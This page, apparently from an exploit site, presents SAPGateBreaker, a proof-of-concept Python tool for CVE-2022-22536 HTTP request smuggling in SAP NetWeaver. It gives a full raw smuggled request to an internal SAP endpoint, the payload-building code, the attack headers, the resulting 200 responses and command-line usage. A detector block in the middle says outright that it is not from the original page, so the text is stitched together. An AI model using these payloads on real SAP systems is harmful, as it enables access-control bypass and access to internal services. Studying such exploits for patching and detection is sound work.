## https://sploitus.com/exploit?id=83A12F28-C891-50A2-9B0F-72883CD400A4
# CVE-2022-22536: HTTP Smuggling Through SAP's Front Door
SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
# SAPGateBreaker-Exploit
SAPGateBreaker is a PoC exploit for CVE-2022-22536, a critical HTTP Request Smuggling vulnerability in SAP NetWeaver. It demonstrates how to bypass ACLs by desynchronizing request parsing between ICM and backend services using crafted Content-Length-based payloads.


The vulnerability identified as CVE-2022-22536 represents a critical flaw in SAP NetWeaver Application Server, exposing installations to HTTP Request Smuggling attacks. This vulnerability, with a CVSS score of 9.8, affects both Java and ABAP stacks, allowing attackers to bypass access control mechanisms and interact with internal applications as though they were on the internal network.
**Understanding HTTP Request Smuggling**
HTTP Request Smuggling (HRS) is an advanced technique that exploits discrepancies in how different components of a web infrastructure (typically proxies, load balancers, and backend servers) interpret the boundaries between HTTP requests. By manipulating headers like `Content-Length` and `Transfer-Encoding`, an attacker can "smuggle" a malicious request that is desynchronized from what the backend server expects.
In essence, when a front-end and a back-end server disagree on where one request ends and the next begins, an attacker can inject a second, hidden request that will be processed with elevated trust. This often results in security bypasses such as WAF evasion, cache poisoning, or ACL circumvention.
**The Nature of CVE-2022-22536**
SAP’s ICM (Internet Communication Manager) improperly parses crafted HTTP requests, enabling a smuggled request to reach internal services. This is particularly impactful in segmented architectures, where direct access to internal services is restricted. Exploiting this vulnerability allows attackers to issue requests that appear to originate from the trusted internal network.
The vulnerability manifests when a payload abuses conflicting interpretations of the end of an HTTP request. This commonly involves injecting a `Transfer-Encoding: chunked` header or manipulating the `Content-Length` field to cause the desynchronization.
**Initial Payload Failures and Chunked Encoding Rejection**
During testing, payloads leveraging canonical chunked smuggling techniques led to `408 Request Timeout` responses from SAP ICM. This behavior indicated that SAP's HTTP stack does not support `Transfer-Encoding: chunked` in the expected manner, preventing traditional chunked-based desynchronization.
As a result, the exploit methodology shifted to using `Content-Length` headers for desynchronization. A crafted request with an empty chunked payload followed by a valid secondary HTTP request successfully bypassed request boundaries. This alternate strategy proved effective in bypassing internal access controls.
**Final Exploit Strategy and Code Implementation**
The working exploit sends a POST request to a public endpoint (`/sap/admin/public/default.html`) with a `Content-Length` header, followed by an embedded GET request that is intended to reach an internal resource.
```http
POST /sap/admin/public/default.html HTTP/1.1
Host: 172.32.22.7:50000
Authorization: Basic YTph
Cookie: saplb_*=(J2EE7364720)7364750
Content-Type: application/json
Content-Length: 128

0

GET /sap/bc/webdynpro/sap/appl_soap_management HTTP/1.1
Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
Connection: close
```
This results in a successful internal access:
```http
HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server
Content-Length: 4465
Content-Type: text/html
Connection: Keep-Alive
```
The implementation iterates through a list of internal SAP URLs that are normally restricted. A comparison is made between the status code received via direct access and the one received when accessed through the smuggled request. If the internal access returns 200 (while direct access returns 403 or 404), it indicates that the smuggling technique successfully bypassed internal access controls.
The logic for building the payload:
```python
def build_smuggled_request(path):
    # Body of the outer POST: a bare chunk terminator ("0" + empty line) followed by
    # a complete second request addressed to the loopback host.
    return f"0\r\n\r\nGET {path} HTTP/1.1\r\nHost: 127.0.0.1\r\nX-Forwarded-For: 127.0.0.1\r\nConnection: close\r\n\r\n"
```
The attack is executed using a crafted POST request containing the smuggled payload:
```python
# host and port come from the -u/--url argument; body is the string returned by
# build_smuggled_request(), so Content-Length covers the whole embedded request.
headers = {
    "Host": f"{host}:{port}",
    "Authorization": "Basic YTph",
    "Cookie": "saplb_*=(J2EE7364720)7364750",
    "Content-Type": "application/json",
    "Content-Length": str(len(body.encode("utf-8"))),
}
```
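As an added defender-side example (not code from SAPGateBreaker or from this page), the check below inspects a raw request for the Content-Length based pattern described above: a body that opens with a bare chunk terminator and carries a second request line aimed at loopback, plus the classic CL/TE and length-mismatch ambiguities. The function and regex names, and the two sample requests, are constructed for this example.

```python
import re

# Request line of a second HTTP request hidden inside the first request's body.
REQUEST_LINE = re.compile(rb"(?m)^(GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) \S+ HTTP/1\.[01]\r?$")
# Host/X-Forwarded-For headers in the body that point at the backend's own loopback.
LOOPBACK_HOST = re.compile(rb"(?mi)^(Host|X-Forwarded-For):\s*(127\.0\.0\.1|localhost)\b")


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (request_line, headers, body); header names lowercased."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def smuggling_findings(raw: bytes) -> list:
    """Return reasons this request looks like a CL-based smuggling attempt; empty list if none."""
    _, headers, body = parse_request(raw)
    findings = []
    cl = headers.get(b"content-length", [])
    te = headers.get(b"transfer-encoding", [])
    if cl and te:
        findings.append("both Content-Length and Transfer-Encoding present")
    if len(set(cl)) > 1:
        findings.append("conflicting Content-Length values")
    if cl and not cl[0].isdigit():
        findings.append("non-numeric Content-Length")
    elif cl and int(cl[0]) != len(body):
        findings.append(f"Content-Length {int(cl[0])} != actual body length {len(body)}")
    if not te and body.startswith(b"0\r\n\r\n"):
        findings.append("body starts with a chunk terminator but no chunked encoding was declared")
    if REQUEST_LINE.search(body):
        findings.append("HTTP request line embedded in body")
        if LOOPBACK_HOST.search(body):
            findings.append("embedded request addresses loopback (Host/X-Forwarded-For)")
    return findings


# Constructed samples: the PoC shape from this page (Content-Length computed to match) and a benign JSON POST.
SMUGGLED_BODY = (b"0\r\n\r\nGET /sap/bc/webdynpro/sap/appl_soap_management HTTP/1.1\r\n"
                 b"Host: 127.0.0.1\r\nX-Forwarded-For: 127.0.0.1\r\nConnection: close\r\n\r\n")
SMUGGLED_REQUEST = (b"POST /sap/admin/public/default.html HTTP/1.1\r\nHost: 172.32.22.7:50000\r\n"
                    b"Content-Type: application/json\r\nContent-Length: "
                    + str(len(SMUGGLED_BODY)).encode() + b"\r\n\r\n" + SMUGGLED_BODY)
BENIGN_REQUEST = (b"POST /sap/admin/public/default.html HTTP/1.1\r\nHost: 172.32.22.7:50000\r\n"
                  b"Content-Type: application/json\r\nContent-Length: 13\r\n\r\n" b'{"ping":true}')
```

Run over captured requests at the reverse proxy or from a PCAP; a non-empty result on a request to a public SAP path is the signal to alert on, and the length-mismatch and CL/TE checks also cover the chunked variants the page says ICM rejected.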
**Observed Results**
In multiple test cases, endpoints such as `/sap/public/bc/icf/info` or `/heapdump/`, which normally returned `403 Forbidden` or `404 Not Found`, responded with `200 OK` when accessed through the smuggled request. This demonstrates a successful circumvention of SAP’s access controls.
The tool’s output included both sent payloads and response headers, enabling precise forensic validation:
```
>>> Sent Payload:
POST /sap/admin/public/default.html HTTP/1.1
Host: 172.32.22.7:50000
...
>>> Received Response:
HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server
...
```
Normal Request: (screenshot)

Exploit Request: (screenshot)

**Conclusion**
CVE-2022-22536 highlights the persistent threat posed by HTTP Request Smuggling in modern enterprise software stacks. The presented proof-of-concept is a demonstration of the underlying vulnerability and serves as a tool for validation and defense testing.
Administrators are strongly advised to apply SAP security updates and implement appropriate reverse proxy protections to prevent malformed HTTP request propagation.
More details on CVE-2022-22536 can be found at:
https://nvd.nist.gov/vuln/detail/CVE-2022-22536
SAP Security Note:
https://launchpad.support.sap.com/#/notes/3123396
**SAPGateBreaker Exploit**
SAPGateBreaker is a standalone Python tool that automates testing for CVE-2022-22536, a critical HTTP Request Smuggling vulnerability in SAP NetWeaver Application Server.
---
**Usage**
```bash
python3 sapgatebreaker.py -u http://<target-host>:<port> [--verbose]
```
**Arguments:**
- `-u`, `--url`: Target URL (e.g., `http://172.32.22.7:50000`)
- `-v`, `--verbose`: Enables detailed header and body output for each request and response
**Features:**
- Detects SAP NetWeaver version via HTTP header inspection
- Builds desynchronized HTTP request payloads for internal access testing
- Compares direct vs. smuggled responses to identify bypasses
- Logs all data to `poc.txt` for further analysis
**Remediation:**
https://community.sap.com/t5/technology-blogs-by-members/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation/ba-p/13528083
**Disclaimer**
This tool is intended for educational and authorized penetration testing only. Unauthorized use against systems without explicit permission is strictly prohibited and may violate applicable laws.